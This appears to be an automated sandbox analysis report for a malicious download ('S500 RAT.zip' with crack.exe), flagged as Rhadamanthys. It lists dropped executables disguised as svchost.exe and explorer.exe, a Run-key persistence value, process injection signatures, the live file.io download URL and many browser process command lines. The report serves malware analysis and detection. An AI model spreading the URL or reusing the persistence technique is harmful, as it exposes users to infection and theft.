Analysis Overview
Threat Level: Known bad
The file https://file.io/k3MVzAZvKJCU was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Executes dropped EXE
UPX packed file
Loads dropped DLL
Adds Run key to start application
Detects Pyinstaller
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
NTFS ADS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-04 15:47
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-04 15:47
Reported
2024-04-04 15:49
Platform
win11-20240221-en
Max time kernel
128s
Max time network
132s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1616 created 2204 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | C:\Windows\system32\sihost.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000\Software\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe" | C:\Users\Admin\explorer.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\S500 RAT.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\S500 RAT\S500 RAT\S500 RAT\S500 RAT\crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://file.io/k3MVzAZvKJCU
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd657e3cb8,0x7ffd657e3cc8,0x7ffd657e3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1964 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2572 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6316 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8412 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8436 /prefetch:1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004D8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10212 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7876 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11028 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9856 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7748 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8660 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9712 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8136 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
